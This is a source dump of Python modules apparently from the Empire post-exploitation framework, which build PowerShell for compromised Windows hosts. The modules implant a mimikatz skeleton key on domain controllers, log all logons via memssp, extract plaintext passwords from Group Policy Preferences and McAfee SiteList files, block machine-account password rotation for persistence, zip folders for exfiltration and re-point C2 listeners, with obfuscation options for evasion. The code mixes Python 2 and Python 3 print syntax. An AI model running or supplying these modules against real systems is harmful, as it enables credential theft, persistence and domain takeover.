'Domain' : { 39 
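# (continuation of the 'Domain' option entry opened on the previous line)
                'Description' : 'Domain to resolve SID for, defaults to the current domain.',
                'Required' : False,
                'Value' : ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Build the PowerShell script that runs PowerView's Get-DomainSID.

        Reads powerview.ps1 from the install path, reduces it to the code the
        function named by self.info["Name"] needs (per
        helpers.generate_dynamic_powershell_script), then appends the call
        with every non-Agent option that has a value; a value of "true" is
        emitted as a bare switch, anything else as "-Option value".

        Args:
            obfuscate: when True the finished script goes through
                helpers.obfuscate before being returned.
            obfuscationCommand: forwarded to helpers.obfuscate unchanged.

        Returns:
            The script string, or "" (after printing an error) when the module
            source file cannot be opened or read.
        """

        moduleName = self.info["Name"]

        # read in the common powerview.ps1 module source code
        moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
        try:
            # 'with' releases the handle even if read() fails; the previous
            # open()/read()/close() sequence leaked it on that path.
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            # narrowed from a bare except so KeyboardInterrupt and real bugs still surface
            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
            return ""

        # get just the code needed for the specified function
        script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

        script += moduleName + " "
        scriptEnd = ""
        for option, values in self.options.iteritems():
            if option.lower() != "agent":
                if values['Value'] and values['Value'] != '':
                    if values['Value'].lower() == "true":
                        # if we're just adding a switch
                        scriptEnd += " -" + str(option)
                    else:
                        scriptEnd += " -" + str(option) + " " + str(values['Value'])

        scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
        # Bug fix: scriptEnd was assembled but never appended, so the Domain
        # option and the "completed!" banner were silently dropped. Every
        # sibling module (e.g. zipfolder) does `script += scriptEnd` here.
        script += scriptEnd
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script

-------------------------------------------------------------------------------- /lib/modules/powershell/management/invoke_script.py: --------------------------------------------------------------------------------
from lib.common import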
helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Invoke-Script', 9 | 10 | 'Author': ['@harmj0y'], 11 | 12 | 'Description': ('Run a custom script. Useful for mass-taskings or script autoruns.'), 13 | 14 | 'Background' : True, 15 | 16 | 'OutputExtension' : None, 17 | 18 | 'NeedsAdmin' : False, 19 | 20 | 'OpsecSafe' : True, 21 | 22 | 'Language' : 'powershell', 23 | 24 | 'MinLanguageVersion' : '2', 25 | 26 | 'Comments': [] 27 | } 28 | 29 | # any options needed by the module, settable during runtime 30 | self.options = { 31 | # format: 32 | # value_name : {description, required, default_value} 33 | 'Agent' : { 34 | 'Description' : 'Agent to run module on.', 35 | 'Required' : True, 36 | 'Value' : '' 37 | }, 38 | 'ScriptPath' : { 39 | 'Description' : 'Full path to the PowerShell script.ps1 to run (on attacker machine)', 40 | 'Required' : False, 41 | 'Value' : '' 42 | }, 43 | 'ScriptCmd' : { 44 | 'Description' : 'Script command (Invoke-X) from file to run, along with any specified arguments.', 45 | 'Required' : True, 46 | 'Value' : '' 47 | } 48 | } 49 | 50 | # save off a copy of the mainMenu object to access external functionality 51 | # like listeners/agent handlers/etc. 52 | self.mainMenu = mainMenu 53 | 54 | for param in params: 55 | # parameter format is [Name, Value] 56 | option, value = param 57 | if option in self.options: 58 | self.options[option]['Value'] = value 59 | 60 | 61 | def generate(self, obfuscate=False, obfuscationCommand=""): 62 | 63 | scriptPath = self.options['ScriptPath']['Value'] 64 | scriptCmd = self.options['ScriptCmd']['Value'] 65 | script = '' 66 | 67 | if(scriptPath != ''): 68 | try: 69 | f = open(scriptPath, 'r') 70 | except: 71 | print helpers.color("[!] 
Could not read script source path at: " + str(scriptPath)) 72 | return "" 73 | 74 | script = f.read() 75 | f.close() 76 | script += '\n' 77 | 78 | script += "%s" %(scriptCmd) 79 | if obfuscate: 80 | script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) 81 | return script 82 | -------------------------------------------------------------------------------- /lib/modules/powershell/management/logoff.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Logoff User', 9 | 10 | 'Author': ['@harmj0y'], 11 | 12 | 'Description': ("Logs the current user (or all users) off the machine."), 13 | 14 | 'Background' : False, 15 | 16 | 'OutputExtension' : None, 17 | 18 | 'NeedsAdmin' : False, 19 | 20 | 'OpsecSafe' : False, 21 | 22 | 'Language' : 'powershell', 23 | 24 | 'MinLanguageVersion' : '2', 25 | 26 | 'Comments': [] 27 | } 28 | 29 | # any options needed by the module, settable during runtime 30 | self.options = { 31 | # format: 32 | # value_name : {description, required, default_value} 33 | 'Agent' : { 34 | 'Description' : 'Agent to run module on.', 35 | 'Required' : True, 36 | 'Value' : '' 37 | }, 38 | 'AllUsers' : { 39 | 'Description' : 'Switch. Log off all current users.', 40 | 'Required' : False, 41 | 'Value' : '' 42 | }, 43 | } 44 | 45 | # save off a copy of the mainMenu object to access external functionality 46 | # like listeners/agent handlers/etc. 
47 | self.mainMenu = mainMenu 48 | 49 | for param in params: 50 | # parameter format is [Name, Value] 51 | option, value = param 52 | if option in self.options: 53 | self.options[option]['Value'] = value 54 | 55 | 56 | def generate(self, obfuscate=False, obfuscationCommand=""): 57 | 58 | allUsers = self.options['AllUsers']['Value'] 59 | 60 | if allUsers.lower() == "true": 61 | script = "'Logging off all users.'; Start-Sleep -s 3; $null = (gwmi win32_operatingsystem).Win32Shutdown(4)" 62 | else: 63 | script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f" 64 | if obfuscate: 65 | script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) 66 | return script 67 | -------------------------------------------------------------------------------- /lib/modules/powershell/management/restart.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Restart-Computer', 9 | 10 | 'Author': ['@harmj0y'], 11 | 12 | 'Description': ("Restarts the specified machine."), 13 | 14 | 'Background' : False, 15 | 16 | 'OutputExtension' : None, 17 | 18 | 'NeedsAdmin' : False, 19 | 20 | 'OpsecSafe' : False, 21 | 22 | 'Language' : 'powershell', 23 | 24 | 'MinLanguageVersion' : '2', 25 | 26 | 'Comments': [] 27 | } 28 | 29 | # any options needed by the module, settable during runtime 30 | self.options = { 31 | # format: 32 | # value_name : {description, required, default_value} 33 | 'Agent' : { 34 | 'Description' : 'Agent to run module on.', 35 | 'Required' : True, 36 | 'Value' : '' 37 | } 38 | } 39 | 40 | # save off a copy of the mainMenu object to access external functionality 41 | # like listeners/agent handlers/etc. 
42 | self.mainMenu = mainMenu 43 | 44 | for param in params: 45 | # parameter format is [Name, Value] 46 | option, value = param 47 | if option in self.options: 48 | self.options[option]['Value'] = value 49 | 50 | 51 | def generate(self, obfuscate=False, obfuscationCommand=""): 52 | 53 | script = "'Restarting computer';Restart-Computer -Force" 54 | if obfuscate: 55 | script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) 56 | return script 57 | -------------------------------------------------------------------------------- /lib/modules/powershell/management/sid_to_user.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'SID-to-User', 9 | 10 | 'Author': ['@harmj0y'], 11 | 12 | 'Description': ("Converts a specified domain sid to a user."), 13 | 14 | 'Background' : False, 15 | 16 | 'OutputExtension' : None, 17 | 18 | 'NeedsAdmin' : False, 19 | 20 | 'OpsecSafe' : True, 21 | 22 | 'Language' : 'powershell', 23 | 24 | 'MinLanguageVersion' : '2', 25 | 26 | 'Comments': [] 27 | } 28 | 29 | # any options needed by the module, settable during runtime 30 | self.options = { 31 | # format: 32 | # value_name : {description, required, default_value} 33 | 'Agent' : { 34 | 'Description' : 'Agent to run module on.', 35 | 'Required' : True, 36 | 'Value' : '' 37 | }, 38 | 'SID' : { 39 | 'Description' : 'Domain SID to translate.', 40 | 'Required' : True, 41 | 'Value' : '' 42 | } 43 | } 44 | 45 | # save off a copy of the mainMenu object to access external functionality 46 | # like listeners/agent handlers/etc. 
47 | self.mainMenu = mainMenu 48 | 49 | for param in params: 50 | # parameter format is [Name, Value] 51 | option, value = param 52 | if option in self.options: 53 | self.options[option]['Value'] = value 54 | 55 | 56 | def generate(self, obfuscate=False, obfuscationCommand=""): 57 | 58 | script = "(New-Object System.Security.Principal.SecurityIdentifier(\"%s\")).Translate( [System.Security.Principal.NTAccount]).Value" %(self.options['SID']['Value']) 59 | if obfuscate: 60 | script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) 61 | return script 62 | -------------------------------------------------------------------------------- /lib/modules/powershell/management/switch_listener.py: -------------------------------------------------------------------------------- 1 | from lib.common import helpers 2 | 3 | class Module: 4 | 5 | def __init__(self, mainMenu, params=[]): 6 | 7 | self.info = { 8 | 'Name': 'Spawn', 9 | 10 | 'Author': ['@harmj0y'], 11 | 12 | 'Description': ('Overwrites the listener controller logic with the agent with the ' 13 | 'logic from generate_comms() for the specified listener.'), 14 | 15 | 'Background' : False, 16 | 17 | 'OutputExtension' : None, 18 | 19 | 'NeedsAdmin' : False, 20 | 21 | 'OpsecSafe' : True, 22 | 23 | 'Language' : 'powershell', 24 | 25 | 'MinLanguageVersion' : '2', 26 | 27 | 'Comments': [] 28 | } 29 | 30 | # any options needed by the module, settable during runtime 31 | self.options = { 32 | # format: 33 | # value_name : {description, required, default_value} 34 | 'Agent' : { 35 | 'Description' : 'Agent to run module on.', 36 | 'Required' : True, 37 | 'Value' : '' 38 | }, 39 | 'Listener' : { 40 | 'Description' : 'Listener to switch agent comms to.', 41 | 'Required' : True, 42 | 'Value' : '' 43 | } 44 | } 45 | 46 | # save off a copy of the mainMenu object to access external functionality 47 | # like listeners/agent handlers/etc. 
# (continuation of Module.__init__ from the previous line)
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the PowerShell that re-points this agent at another listener.

        Looks the 'Listener' option up in mainMenu.listeners.activeListeners,
        asks the matching loaded listener module for fresh PowerShell comms
        code via generate_comms(language='powershell'), and prefixes it with a
        Send-Message call so the current listener is told about the switch.

        Args:
            obfuscate: when True the combined script goes through
                helpers.obfuscate before being returned.
            obfuscationCommand: forwarded to helpers.obfuscate unchanged.

        Returns:
            The script string, or '' (after printing an error) when the named
            listener is not active.
        """

        # extract all of our options
        listenerName = self.options['Listener']['Value']

        if listenerName not in self.mainMenu.listeners.activeListeners:
            print helpers.color("[!] Listener '%s' doesn't exist!" % (listenerName))
            return ''

        activeListener = self.mainMenu.listeners.activeListeners[listenerName]
        listenerOptions = activeListener['options']

        # activeListener['moduleName'] selects which loaded listener type builds the comms code
        commsCode = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_comms(listenerOptions=listenerOptions, language='powershell')

        # signal the existing listener that we're switching listeners, and the new comms code
        # NOTE(review): listenerName is placed inside a single-quoted PowerShell
        # literal with no escaping; the membership check above limits it to names
        # of active listeners -- confirm those names can never contain a quote.
        commsCode = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (listenerName, commsCode)
        if obfuscate:
            commsCode = helpers.obfuscate(self.mainMenu.installPath, psScript=commsCode, obfuscationCommand=obfuscationCommand)
        return commsCode

-------------------------------------------------------------------------------- /lib/modules/powershell/management/user_to_sid.py: --------------------------------------------------------------------------------
from lib.common import helpers

class Module:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'User-to-SID',

            'Author': ['@harmj0y'],

            'Description': ("Converts a specified domain\\user to a domain sid."),

            'Background' : False,

            'OutputExtension' : None,

            'NeedsAdmin' : False,

            'OpsecSafe' : True,

            'Language' : 'powershell',

            'MinLanguageVersion' : '2',

            'Comments': []
        }

        # any options needed by the module, settable during runtime
# --- tail of the preceding module: option table, mainMenu hand-off and generate() ---
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Domain' : {
                'Description'   :   'Domain name for translation.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'User' : {
                'Description'   :   'Username for translation.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # Keep a handle on the main menu: generate() needs installPath for the
        # obfuscation helper, and other modules reach listeners/agents through it.
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return a PowerShell one-liner that translates Domain\\User to its SID.

        Domain and User come straight from self.options (operator-supplied) and
        are substituted verbatim into the double-quoted NTAccount arguments.
        With obfuscate=True the line is passed through helpers.obfuscate first.
        """
        domain = self.options['Domain']['Value']
        user = self.options['User']['Value']
        script = ("(New-Object System.Security.Principal.NTAccount(\"%s\",\"%s\"))"
                  ".Translate([System.Security.Principal.SecurityIdentifier]).Value" % (domain, user))

        if not obfuscate:
            return script
        return helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)

--------------------------------------------------------------------------------
/lib/modules/powershell/management/zipfolder.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: zip a folder on the target host for later exfiltration."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Invoke-ZipFolder',
            'Author': ['@harmj0y'],
            'Description': ('Zips up a target folder for later exfiltration.'),
            'Background' : False,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': []
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Folder' : {
                'Description'   :   'Folder path to zip.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'ZipFileName' : {
                'Description'   :   'Zip name/path to create.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (obfuscation helper)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Build the PowerShell that defines and then calls Invoke-ZipFolder.

        The function source is emitted verbatim; the -Folder/-ZipFileName
        arguments are appended from self.options by the rest of this method.
        """
        script = """
function Invoke-ZipFolder
{
    param([string]$Folder, [string]$ZipFileName)

    if (-not (Test-Path $Folder)) {
        "Target folder $Folder doesn't exist."
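        return
    }

    if (test-path $ZipFileName) {
        "Zip file already exists at $ZipFileName"
        return
    }

    $Directory = Get-Item $Folder

    Set-Content $ZipFileName ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
    (dir $ZipFileName).IsReadOnly = $false

    $ZipFileName = resolve-path $ZipFileName

    $ZipFile = (new-object -com shell.application).NameSpace($ZipFileName)
    $ZipFile.CopyHere($Directory.FullName)
    "Folder $Folder zipped to $ZipFileName"
}
Invoke-ZipFolder"""

        # Append -Folder / -ZipFileName from the option table.  A value that
        # contains whitespace (e.g. C:\Program Files\x) is wrapped in double
        # quotes -- unquoted it would be split into several positional
        # arguments and the call would fail; values the operator already
        # quoted are passed through untouched.  Embedded double quotes are
        # escaped with a backtick, PowerShell's escape character.
        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            arg = str(value)
            if any(c.isspace() for c in arg) and arg[0] not in '"\'':
                arg = '"' + arg.replace('"', '`"') + '"'
            script += " -" + str(option) + " " + arg

        # NOTE(review): Shell.Application's CopyHere returns before the copy
        # is complete, so the "zipped" message above can precede a fully
        # written archive on large folders; poll the zip before collecting it.
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: stop (or, with CleanUp, restore) automatic machine-account password rotation."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        # NeedsAdmin is True because generate() writes under HKLM.
        self.info = {
            'Name': 'Invoke-DisableMachineAcctChange',
            'Author': ['@harmj0y'],
            'Description': ('Disables the machine account for the target system '
                            'from changing its password automatically.'),
            'Background' : False,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': []
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''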
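# --- continuation of disable_machine_acct_change.py: rest of the option table and generate() ---
            },
            'CleanUp' : {
                'Description'   :   'Switch. Re-enable machine password changes.',
                'Required'      :   False,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (obfuscation helper)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return PowerShell that sets Netlogon\\Parameters\\DisablePasswordChange.

        Value 1 stops the machine account from rotating its password (the
        persistence effect); when the CleanUp option is 'true' the value is
        reset to 0 instead.  Both variants end with a status string so the
        agent reports what was done.
        """
        # Raw string on purpose: \S, \C, \N and \P are not valid Python escapes
        # (\N is a hard SyntaxError on Python 3); the old plain literal only
        # worked because Python 2 leaves unknown escapes alone.
        key = r"HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters"

        cleanup = str(self.options['CleanUp']['Value']).lower() == 'true'
        if cleanup:
            new_value, message = 0, 'Machine account password change re-enabled.'
        else:
            new_value, message = 1, 'Machine account password change disabled.'

        script = ("$null=Set-ItemProperty -Force -Path %s -Name DisablePasswordChange -Value %d; '%s'"
                  % (key, new_value, message))
        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/persistence/misc/memssp.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: run Invoke-Mimikatz 'misc::memssp' to log authentications on the host."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        # OpsecSafe is False: the technique patches a running system process.
        self.info = {
            'Name': 'Invoke-Mimikatz memssp',
            'Author': ['@JosephBialek', '@gentilkiwi'],
            # mimikatz's memssp module names its log file mimilsa.log
            # ("mimi" + "lsa"); the earlier text spelled it "mimisla.log".
            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to execute misc::memssp to log all authentication events "
                            "to C:\\Windows\\System32\\mimilsa.log."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            'OpsecSafe' : False,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the Invoke-Mimikatz source followed by a 'misc::memssp' call.

        Returns "" (after printing an error) when the module source cannot be
        read.  With obfuscate=True the obfuscated copy of the source is read
        from obfuscated_module_source/ and the trailing call is obfuscated too.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            # the obfuscated copy is expected under obfuscated_module_source/
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        script = moduleCode

        # The mimikatz command is passed as a quoted literal to -Command;
        # nothing is base64-encoded here (the old comment said otherwise).
        command = "misc::memssp"
        scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"

        # Raw string: \W, \S and \m are not valid Python escapes.  The log
        # file is mimilsa.log (previously misspelt "mimisla.log" here).
        scriptEnd += r'"memssp installed, check C:\Windows\System32\mimilsa.log for logon events."'
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        script += scriptEnd
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/persistence/misc/skeleton_key.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: run Invoke-Mimikatz 'misc::skeleton' on a domain controller."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Invoke-Mimikatz SkeletonKey',
            'Author': ['@JosephBialek', '@gentilkiwi'],
            'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
                            "to execute misc::skeleton to implant a skeleton key w/ password 'mimikatz'. "
                            "ONLY APPLICABLE ON DOMAIN CONTROLLERS!"),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : True,
            # Was True.  This implants a domain-wide backdoor password through
            # the same in-memory Invoke-Mimikatz patch as the sibling memssp
            # module, which is (correctly) marked False; the framework consults
            # this flag before running a module, so True hid the warning.
            'OpsecSafe' : False,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'http://clymb3r.wordpress.com/',
                'http://blog.gentilkiwi.com'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the Invoke-Mimikatz source followed by a 'misc::skeleton' call.

        Returns "" (after printing an error) when the module source cannot be
        read.  With obfuscate=True the obfuscated copy of the source is read
        from obfuscated_module_source/ and the trailing call is obfuscated too.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
        if obfuscate:
            # the obfuscated copy is expected under obfuscated_module_source/
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        script = moduleCode

        # The mimikatz command is passed as a quoted literal to -Command;
        # nothing is base64-encoded here (the old comment said otherwise).
        command = "misc::skeleton"
        scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';"

        scriptEnd += '"Skeleton key implanted. Use password \'mimikatz\' for access."'
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        script += scriptEnd
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/privesc/gpp.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: run Get-GPPPassword to recover credentials stored in Group Policy Preferences."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Get-GPPPassword',
            'Author': ['@obscuresec'],
            'Description': ('Retrieves the plaintext password and other information for '
                            'accounts pushed through Group Policy Preferences.'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.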
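# --- continuation of gpp.py: mainMenu hand-off, option parsing and generate() ---
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the Get-GPPPassword source plus a call built from self.options.

        Output is piped through Out-String and followed by a completion
        marker.  Returns "" (after printing an error) when the module source
        cannot be read.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Get-GPPPassword.ps1"
        if obfuscate:
            # the obfuscated copy is expected under obfuscated_module_source/
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        script = moduleCode

        scriptEnd = "Get-GPPPassword "

        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if value.lower() == "true":
                # bare switch parameter
                scriptEnd += " -" + str(option)
            else:
                scriptEnd += " -" + str(option) + " " + str(value)

        scriptEnd += "| Out-String | %{$_ + \"`n\"};"
        scriptEnd += "'Get-GPPPassword completed'"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        script += scriptEnd
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/privesc/mcafee_sitelist.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: run Get-SiteListPassword to decrypt passwords from McAfee SiteList.xml files."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Get-SiteListPassword',
            'Author': ['@harmj0y', '@funoverip'],
            'Description': ("Retrieves the plaintext passwords for found McAfee's SiteList.xml files."),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'https://github.com/funoverip/mcafee-sitelist-pwd-decryption/'
            ]
        }

        # Operator-settable options; format:
        #   value_name : {description, required, default_value}
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            }
        }

        # mainMenu gives generate() access to installPath (module source + obfuscation)
        self.mainMenu = mainMenu

        # params arrive as [Name, Value] pairs; names not in the table are ignored
        for name, value in params:
            if name in self.options:
                self.options[name]['Value'] = value


    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Return the Get-SiteListPassword source plus a call built from self.options.

        Output is piped through Out-String and followed by a completion
        marker.  Returns "" (after printing an error) when the module source
        cannot be read.
        """
        moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Get-SiteListPassword.ps1"
        if obfuscate:
            # the obfuscated copy is expected under obfuscated_module_source/
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            with open(moduleSource, 'r') as f:
                moduleCode = f.read()
        except IOError:
            print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
            return ""

        script = moduleCode

        scriptEnd = "Get-SiteListPassword "

        for option, values in self.options.items():
            if option.lower() == "agent":
                continue
            value = values['Value']
            if not value:
                continue
            if value.lower() == "true":
                # bare switch parameter
                scriptEnd += " -" + str(option)
            else:
                scriptEnd += " -" + str(option) + " " + str(value)

        scriptEnd += "| Out-String | %{$_ + \"`n\"};"
        scriptEnd += "'Get-SiteListPassword completed'"
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        script += scriptEnd
        return script

--------------------------------------------------------------------------------
/lib/modules/powershell/privesc/powerup/allchecks.py:
--------------------------------------------------------------------------------
from lib.common import helpers

class Module:
    """Empire module: run PowerUp's Invoke-AllChecks to enumerate local privilege-escalation vectors."""

    def __init__(self, mainMenu, params=[]):
        # Static metadata consumed by the Empire module loader/menu.
        self.info = {
            'Name': 'Invoke-AllChecks',
            'Author': ['@harmj0y'],
            'Description': ('Runs all current checks for Windows privesc vectors.'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : True,
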